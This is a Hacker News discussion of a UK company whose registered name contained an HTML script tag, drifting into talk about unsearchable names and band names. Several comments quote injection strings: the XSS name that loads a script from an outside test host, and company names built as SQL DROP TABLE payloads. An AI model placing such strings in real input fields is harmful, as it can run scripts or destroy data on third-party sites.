Hacker News new | past | comments | ask | show | jobs | submit login
That company whose name used to contain HTML script tags Ltd (service.gov.uk)
436 points by marinintim 31 days ago | hide | past | favorite | 154 comments



Nice to see Bobby Tables is all grown up.

Relevant discussion on the Companies House Developer Forum:

https://forum.aws.chdev.org/t/cross-site-scripting-xss-softw...



I was wondering how much it costs to open a company in the UK to do something like that, and it seems to be really cheap (and quick):

a) Incorporate directly via Companies House

The standard registration fee to set up a company is just £12 for the ‘standard’ Companies House web incorporation service, which takes up to 24 hours to turnaround. You can pay via credit card, debit card or PayPal.

Source: https://www.itcontracting.com/how-much-limited-company-cost/


Yes, it is. Do they still require a minimum of two officers?

(Spam warning: if you form a company at your home address, you will be inundated with paper spam for office equipment. Especially from Dell.)


I have a ltd company registered at home and I got sent a pen with the company name engraved on it - nice spam :)

I also had a letter telling me I was the beneficiary of a few million dollars which was less useful :)


No. You can do it with one person.


Not many DBMS which support stacked queries I'll guess.


Hilarious!


This reminds me of a story I saw on Reddit once. A man worked for a payment processing firm that didn't sanitize their database inputs at all.

One day, they get a new customer called "Select". Absolutely everything stopped working.


I'm disappointed that the discussion seems more about debating whether that person acted in good faith or that the law regarding acceptable characters in company names should be changed, as opposed to the bigger concern of why were they not sanitizing company names? Even without intent to insert HTML, characters such as < or > would still break their pages.


Relevant context: https://twitter.com/zofrex/status/1319286955314614275

Apparently the name used to be

    \"><SCRIPT SRC=MJT.XSS.HT></SCRIPT> LTD


New name is disappointing. The company should at least be renamed to:

    \&quot;&gt;&lt;SCRIPT SRC=MJT.XSS.HT&gt;&lt;/SCRIPT&gt; LTD


How about EICAR ANTIVIRUS TEST FILE? Or the DeCSS key?


hitting mjt.xss.ht returns this:

/* THIS SUBDOMAIN HAS BEEN BANNED FROM THE XSS HUNTER SERVICE.

WE DO NOT ALLOW ABUSE OF OUR SERVICE, ALL SECURITY TESTING MUST BE AUTHORIZED.

Please use our contact form if you believe this ban was a mistake: https://xsshunter.com/contact */


It previously returned an XSS test payload https://pbs.twimg.com/media/ElAYZTcX0AEyFUY?format=jpg&name=...


The character set used looks to be specifically authorized by law[1] so this doesn't appear to be unauthorized testing.

1. https://news.ycombinator.com/item?id=24921261


But not authorized by all the company register clone sites that would have triggered this. The service appears to be for testing your own site.


Will that even work without http:// or at least // in front of the domain name?

Tried it in chrome and sees it as a file name on the current domain.


Seems to have a bit. Cut and paste from the guy who set up \"><SCRIPT SRC=MJT.XSS.HT></SCRIPT> LTD

...

>I am in the process of contacting every website that has triggered my script which has a readily available contact for submitting security issues, or a hackerone account or similar. Alas, the sort of websites that have XSS problems rarely list IT security contacts.


I don't think so. The traditional, canonical regular expression[1] for parsing a URL is

  ^(([^:/?#]+):)?(//([^/?#]*))?([^?#]*)(\?([^#]*))?(#(.*))?
See https://tools.ietf.org/html/rfc3986#appendix-B

The authority section (which contains the host domain) must begin with "//" whether there's a scheme prefix or not. Otherwise it's just part of the path (or query or fragment). IIRC, these semantics are also fixed by HTML such that any attribute like HREF or SRC is parsed as-if using the canonical regex (but after entity substitution and whitespace trimming). Browsers might have implemented this differently many years ago, but I doubt it as it would conflict with being able to use a bare path atom (e.g. foo.html).

[1] I normally eschew using regular expressions for proper parsing, but for URLs the canonical expression is both adequate and advisable for correctness.


It had HTTP originally, twitter just munged it.


You would think if you go to all the trouble to register a company name, you would at least use a domain you control


There's a great club in Berlin called "://about blank"

So if you're gonna Google it, don't use the URL bar.


My favourite social establishment is The Progress Bar.


Nice spot, but the lines are always so long. Fortunately you always know how long you have to wait.


Fun fact: It's currently law that you can have the <> and "" characters in your name.

https://www.legislation.gov.uk/uksi/2015/17/schedule/1/made


What's really fun is many companies' forms don't allow for companies to have any punctuation in their name.


I think I'd excited that as Schedule 1 of this Act doesn't exclude those characters.

For example you can use the characters w,i,n,d,s,o,r but catenated in an ordered string means you have to get special permission.

Arguably the attempt to register this was an attempt to breech the Computer Misuse Act (which would make it illegal).


It’s been 13 years since the Bobby Tables comic was drawn, has nobody actually tried it yet?



What I mean is, has nobody named their child after an SQL injection payload?


LOL!



On a related topic, the name of the company I work for starts with a colon. The rest of the name is a common adjective. As you can imagine, it is virtually ungooglable at the moment. Any thoughts on how to get around this?


Just change the name. It'll be easier and more cost effective in the long run.

I've started working with some software called STACK recently, and it's almost impossible to find anything by searching (go ahead and try!). If it was a commercial product they would be sunk.


At least if it's Haskell's stack build tool, adding the language name to the query makes it pop right up. Not sure if this helps in your case though.


I found your company name in your profile - ":different"

Even if I google ":different" company or without the colon, top results for me is a parfumerie.

When I google different australia, you're the top result.


Surprised New Zealand isn't the top result when you Google "different Australia"


I thought that different Australia is Austria.


Because it's East Australia


More like Australia is the West Island of NZ.


better find a nickname, like D's community did, using dlang lol otherwise no one could find anything on language googling


The Go community had to do the same. Go. A language created by a company that makes a well known search engine.


But by staff who has worked on Plan 9, right?


Those people made it so that one-letter identifier names and junk like ‘fmt’ and ‘Fprintln(w)’ is again okay. So the unusable name fits the spirit quite well.


Sometimes obscurity, as well as tweaking your nose at convention, is a feature.


how hard would it be to learn BASIC using Google? "Basic Programming" is going to have a lot of irrelevant results.


DDG'd

  BASIC programming
all the results were about BASIC, the wiki page to start with, then

* BASIC Programming : 7 Steps - Instructables

* Learn More - Just BASIC

* The History of the BASIC Programming Language

* Programming in BASIC: the absolute beginner tutorial

* FreeBASIC Language | Home

* PureBasic - A powerful BASIC programming language

* Quite BASIC — fun, learning and nostalgia

* World of Spectrum - Documentation - ZX Spectrum manual

Only after all that is a non-basic link

* Introduction | Programming for Beginners


Searched BASIC programming on Google and if also returned results relevant to the actual programming language


BASIC programming ironicly may return better results than if you search for something about a more mainstream current language e.g. python. I often find the first few results are some search engine spam... tutorialspoint or geeksforgeeks etc, when a link to the API would be the logical first result. (Usually the first link to the api is for 3.4 or some random version also)


I've often wondered if any metallurgists have tried to run computer simulations of the annealing process. How would you find their research if they had?


Actually yes :) At least the optimization crowd don't use the phase 'heat treatment', which helps somewhat. But who I really feel bad for is the recruiters trying to hire a chemist who specialises in the element lead.


BRB: going to SEO spam my simulated annealing NPM library homepage with "heat treatment"...


Try it! Nearly every result is related to BASIC. Search engines have gotten very good at guessing what is and isn't a proper noun over the years.


I don't know whether they actually do it but it seems really easy to treat "BASIC" as a distinct idiomatic token from "basic" when the searcher bothers to get the casing right.


It really is amazing how big a difference this makes.

I've started using Apple's Aperture software recently (I'm well aware it's been discontinued). I really like it, but my biggest frustration is that it's difficult to learn how to do new things, because "aperture" is a generic word in photography. I can't search for the name and get results about the software.


One of my favorite mobile games is Antiyoy, by Yiotro (https://github.com/yiotro/Antiyoy) who also created other games like Vodobanka, Achikaps, and Bleentoro.

The creator mentioned that he picked the names because they were pronounceable, unique, memorable, and searchable. That misses out on meaningfulness and familiarity, but those are expensive - by dropping those requirements, you gain easy SEO, trademarks, domains, etc. A big company knowing they're going to sell millions of copies can spend 5 figures on a domain and 6 figures on SEO, but I don't think it's worth it for most startups.



Huh, I play these and I didn't know that's why that had these names, I assumed they were compound words in some language I didn't know. This is like a reverse "XKCD" naming convention.

Also relevant: "Change Your Name" http://www.paulgraham.com/name.html


>I'm well aware it's been discontinued

Limiting the dates to indexes before 2016 might help (at least with google). You can usually train google to get you what you want after a few searches. This was initially a problem with the Elixir programming language, but it learned what I actually wanted it started letting me just type in the term elixir without specifying it was a programming language. On other computers not associated with that account, it does revert back to the not-so-useful results.

e.g.

    apple "aperture" color correction before:2016


> but it learned what I actually wanted it started letting me just type in the term elixir without specifying it was a programming language

Oh, you know what, this might be largely my own fault. I purposefully use Startpage.com as my search engine in order to avoid getting customized results (while still using Google's index).

I worry that customized results put me in a filter bubble—but they certainly have their advantages!


The band Chvrches chose to use the the Roman "u" to spell their name so they'd be easier to search.


Kind of hard to pronounce though. Like that jewellery brand, seemingly pronounced 'buffelgary' or something.


Sorta. It's still pronounced "churches", but it's definitely a common joke to pronounce it chivurches.


See also "Pages", "Numbers", "Keynote"...

Apple don't give a fuck.


No lies detected, but because they aren't professional software I don't have to search for stuff as often. And the other "Professional" Apple app I use is Final Cut Pro, which doesn't similarly have this problem.


Back when I worked at a comparison shopping engine, I had a bit of a laugh when I saw that the indexing pipeline was generating error messages because the "clean" function returned empty for some products in the feed from Amazon, because they had names like "++++++".

It was usually musical albums that liked to have names that made it impossible for fans to find the music.


> Musical albums that liked to have names

The band 'Audiobooks' has taken this to the next level


I like the band A. When I try to find their music though...

https://en.wikipedia.org/wiki/A_(band)


Anyone else remember "The The"?

(Or for a more modern example "!!!")


In another era, “+++ATH” would have been a good name.


Don’t go with !!!

You’ll never find them on YouTube or google unless you search for their informal name: chk chk chk


However, they benefitted greatly in the early ‘00s. If you had them in your Apple Music library, iTunes always put them at the top of your alphabetical music library, keeping them top of mind, ! comes before A. There might have a similar iTunes Store benefit too.

Terrible Google SEO, great accidental Apple SEO.


I always though the best name for a band with only one album would be 'Various Artists' with 'Greatest Hits' for the album name.

They probably exist, I just don't think I can ask a search engine to find them.


https://www.discogs.com/artist/35584-Various-Artists-3

In 1997 Torsten Pröfrock released a highly sought-after dub techno album on the legendary Chain Reaction label under the name "Various Artists". It's a quintessential record in the Basic Channel genre. You can listen it here: https://youtu.be/3165Sf-q8dY


I've seen a band called Special Guests.


"The The" was a pretty notable band in the 80s/90s.


There used to be a local Sydney band called "Free Beer", so the posters for all their support slot gigs would say "$HeadlineAct with Free Beer".


couldn't be any worse than the band names "A" and "My Computer" !

https://acommunication.co.uk

https://en.m.wikipedia.org/wiki/My_Computer_(band)


Google have a hardcoded exception for the band "the the".


SiriusXM truncates a "The" prefix from artist names (so "The Cure" and "The Who" become "Cure" and "Who"). I always wondered how it would display The The. Would it be "The The" (special case), "The" (default removal of "The"), or an empty string "" (in the unlikely case the algorithm recursively removed "The" prefixes)? Eventually they played a The The song and the answer is "The The".


I always liked to imagine filing "The The" under "The, The".


Of course the right way of filing them is autobiographically... (I went to see the Infected tour with Louise, so they're filed under "L"...)


There’s a video on YouTube with three full-width explanation points as the title. I watched it once, and although it wasn’t particularly interesting, it bugs me that I cannot find it again.


Convince the powers-that-be in your company to invest in contracting with a marketing/SEO person or team to help come up with a new name. You want someone with marketing chops so that it's a good name, but you also want someone who knows about SEO so you don't end up on the second page for your own name search.


Is it "Colon Blow"?


This just made me laugh so hard. Phil Hartman was great. Here's the reference: https://www.youtube.com/watch?v=Ku42Iszh9KM


Launch a multi-million dollar brand advertising campaign.


And I thought Yahoo! (with exclamation mark) had it rough.


At least they're a little better than a hypothetical -"Yahoo" which would return no results for your company at all...


I was curious what googling only a negative query would do and for this, -"Yahoo" returns just the dictionary definition of the word "yahoo" and no search results.


It does that for any "negative term only" search afaict


:oscopy ?


:wq!


I registered <b>Be</b> for a small company a long time ago. I thought it was clever. They folded during the tech bubble.


clearly, it was older as now it would be encouraged to use <strong>Be</strong>


That's actually kind of clever, albeit developer centric.


<b>Be</b>, <strong>be</strong>, but don’t <head>be</head>. That's an illegal act of violence.


isn't illegal html too? i've never seen raw text the head tag.


Also, too many vowels for a modern company name.


<blink>Be</blink>


<blink>Blink</blink> -- It's a deprecated tag now, and most browsers don't support it, but I would have loved to have seen that as a company... <marquee> is still supported though....


Bold bee?


Be bold ?


𝗕𝗲


I’ve never seen bold in an HN comment before? How do you do it?


𝐔𝐧𝐢𝐜𝐨𝐝𝐞 𝐡𝐚𝐬 𝐜𝐡𝐚𝐫𝐚𝐜𝐭𝐞𝐫𝐬 𝐭𝐡𝐚𝐭 𝐥𝐨𝐨𝐤 𝐬𝐢𝐦𝐢𝐥𝐚𝐫 𝐭𝐨 𝐟𝐨𝐫𝐦𝐚𝐭𝐭𝐞𝐝 𝐭𝐞𝐱𝐭.

𝗨𝗻𝗶𝗰𝗼𝗱𝗲 𝗵𝗮𝘀 𝗰𝗵𝗮𝗿𝗮𝗰𝘁𝗲𝗿𝘀 𝘁𝗵𝗮𝘁 𝗹𝗼𝗼𝗸 𝘀𝗶𝗺𝗶𝗹𝗮𝗿 𝘁𝗼 𝗳𝗼𝗿𝗺𝗮𝘁𝘁𝗲𝗱 𝘁𝗲𝘅𝘁.

𝑈𝑛𝑖𝑐𝑜𝑑𝑒 ℎ𝑎𝑠 𝑐ℎ𝑎𝑟𝑎𝑐𝑡𝑒𝑟𝑠 𝑡ℎ𝑎𝑡 𝑙𝑜𝑜𝑘 𝑠𝑖𝑚𝑖𝑙𝑎𝑟 𝑡𝑜 𝑓𝑜𝑟𝑚𝑎𝑡𝑡𝑒𝑑 𝑡𝑒𝑥𝑡.

𝘜𝘯𝘪𝘤𝘰𝘥𝘦 𝘩𝘢𝘴 𝘤𝘩𝘢𝘳𝘢𝘤𝘵𝘦𝘳𝘴 𝘵𝘩𝘢𝘵 𝘭𝘰𝘰𝘬 𝘴𝘪𝘮𝘪𝘭𝘢𝘳 𝘵𝘰 𝘧𝘰𝘳𝘮𝘢𝘵𝘵𝘦𝘥 𝘵𝘦𝘹𝘵.

𝑼𝒏𝒊𝒄𝒐𝒅𝒆 𝒉𝒂𝒔 𝒄𝒉𝒂𝒓𝒂𝒄𝒕𝒆𝒓𝒔 𝒕𝒉𝒂𝒕 𝒍𝒐𝒐𝒌 𝒔𝒊𝒎𝒊𝒍𝒂𝒓 𝒕𝒐 𝒇𝒐𝒓𝒎𝒂𝒕𝒕𝒆𝒅 𝒕𝒆𝒙𝒕.

𝙐𝙣𝙞𝙘𝙤𝙙𝙚 𝙝𝙖𝙨 𝙘𝙝𝙖𝙧𝙖𝙘𝙩𝙚𝙧𝙨 𝙩𝙝𝙖𝙩 𝙡𝙤𝙤𝙠 𝙨𝙞𝙢𝙞𝙡𝙖𝙧 𝙩𝙤 𝙛𝙤𝙧𝙢𝙖𝙩𝙩𝙚𝙙 𝙩𝙚𝙭𝙩.

(Don't do this: it's _terrible_ for accessibility, as screen readers can't parse these as regular text)


Can confirm. All I see are [X]'s.

𝐔𝐧𝐢𝐜𝐨𝐝𝐞 𝐡𝐚𝐬 𝐜𝐡𝐚𝐫𝐚𝐜𝐭𝐞𝐫𝐬 𝐭𝐡𝐚𝐭 𝐥𝐨𝐨𝐤 𝐬𝐢𝐦𝐢𝐥𝐚𝐫 𝐭𝐨 𝐟𝐨𝐫𝐦𝐚𝐭𝐭𝐞𝐝 𝐭𝐞𝐱𝐭.

I'm curious if that copied the text or the placeholders. It's like hunter2 for the modern era.


> I'm curious if that copied the text or the placeholders.

It copied the text.


FWIW for most of these sorts of things you can scrub it via passing the text through an NFKC or NFKD transform. I'd hope that a screen reader can be updated to handle this case.



These are Unicode characters intended for use in mathematical formulas, not text, so they break all sorts of things. It might make some sense to use them in mathematical Python code (where they do seem to work), but they're hard to type.


Looks like Unicode characters to me.


Be Best


Here is to the company

  Dariusz Jakubowski x'; DROP TABLE users; SELECT '1
that ran in Poland from 2014 to 2019 [0].

[0] https://prod.ceidg.gov.pl/CEIDG/ceidg.public.ui/SearchDetail... (check the reCAPTCHA and click "Dalej")


I giggled at the previous company name being redacted as “[NAME AVAILABLE ON REQUEST FROM COMPANIES HOUSE]” too. Not sure if that’s a common thing to do or if they made an exception for these shenanigans so they didn’t have to display the XSS.


Now someone just has to register "[NAME AVAILABLE ON REQUEST FROM COMPANIES HOUSE]" as a company name...


Kinda tempted to see if Oregon would let me register [REDACTED], LLC

Only 100 dollars...

Edit: Someone beat me to it. Reg #1330411-94


[expletive deleted], LLC


For a minute I thought their name was (without the quotes) "[NAME AVAILABLE ON REQUEST FROM COMPANIES HOUSE]".

Seems like a regulation to add "computer code like expressions" to the list that requires prior approval of the Secretary of State might be useful.


That might require a bit more effort on the part of a company I know, who would have to register their logo "moz://a".


That would be a trade mark rather than a company name in this instance I think. In UK registered trademarks are standard type-written letters for word marks. If they contain symbols then they're figurative marks and it's an image of the mark which is registered.

On that point though, searching on the UK trademark registry it looks like it just strips non-alphanumeric symbols. A search for "Moz://a” returns "moza".


And the officer's last name is Tandy. Good computer name :D


I'm slightly surprised that AAISP's RevK isn't behind this one. I'd document his shenanigans but they'd eventually break out of the data set.


Now _that_ is pretty funny. I wonder what the company name is. Even the PDF of the incorporation certificate doesn't show the name.


\"><SCRIPT SRC=MJT.XSS.HT></SCRIPT> LTD


; DROP TABLE "COMPANIES";-- LTD

(Yes, the description is inaccurate.)

Edit: This is a different company, actually.



Outstanding. What a clever, cheeky fellow. Obligatory XKCD: https://xkcd.com/327/


Just never change the name to "null".


Is Companies House's website not done by GDS or something? I worked on a few GDS projects for DFT, we had to have independent pen testers test our services before they moved between phases.


Companies House wasn't compromised, they warned third parties about potential issues with the underlying data.


According to a thread [1] on Companies House's Developer Forum, they were.

[1]: https://forum.aws.chdev.org/t/cross-site-scripting-xss-softw...


No I mean the fact that this was possible on their website, XSS is one of the simplest things to test, in fact it was one of the standard tests UI testers would do on new screens.

Not saying they were compromised.


It wasn't possible on their website.

They provide data feeds to many third parties, who might themselves be vulnerable, hence the notification.


Would be it interesting to know why the name had to be changed?


Because there are a bunch of companies which do aggregation of information about companies, and not all of them used parameterized SQL queries :-/


This is HTML injection, not SQL.


That’s kind of a minor detail.


Not even all SQL engines support quoting all types of values. BigQuery, looking at you.


And who's problem is that?


On a "what's reasonable" level, or on a "gets you called in by a minister or MP to be yelled at" level?


Solidarity to all of the folks who have had to work with elected officials. I got ripped a new one because I recommended we disable a PHP project in the mid-2000s because a hay bale reporting app (report counts of bay hales on farms) due to an RCE bug. Within a few hours of the app being disabled there was drama from a politician who got a phone call from a prominent farmer...


Speaking of the power of farmers… https://youtu.be/rStL7niR7gs?t=439 The relevant clip is just 20 seconds long.


That is excellent.

Relevant - John Mellencamp using his hit song to siphon off subsidies to his family and relatives.

https://reason.com/2005/04/15/cash-on-the-scarecrow-pork-on/


Relatedly, several years ago I scraped all companies on the old companies house webcheck site. There were two that interrupted my scraper: both contained '<' in the company name, and both seemed to take the webcheck service offline for a few seconds whenever I requested their pages. I can't say for sure - it might have been a temporary IP block I suppose - but it amused me nonetheless.


This is not a prank, its the new Companies house search which still contains some kinks and I assume they had to work around a very specific one here.


My understanding is that the Companies House search is fine, but various third-party consumers of the list might not be.


Here's an internet archive of the old name on one of those https://web.archive.org/web/20201022184617/https://suite.end...


What was the name? It’s former name is listed as “[NAME AVAILABLE ON REQUEST FROM COMPANIES HOUSE]” and it’s current name doesn’t contain any HTML tags (it’s literally the same as the headline)

Those are both funny and confusing names, but they don’t warrant comparison to sql-injections, so I am guessing there’s another name with actual HTML tags.


There was also this project of Mediengruppe Bitnik (check the video with some online bookstores):

http://p-dpa.net/work/script-alert-mediengruppe-bitnik/



Like little Bobby Drop Tables: https://xkcd.com/327/


hahahahaahaha! is this some prank?




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: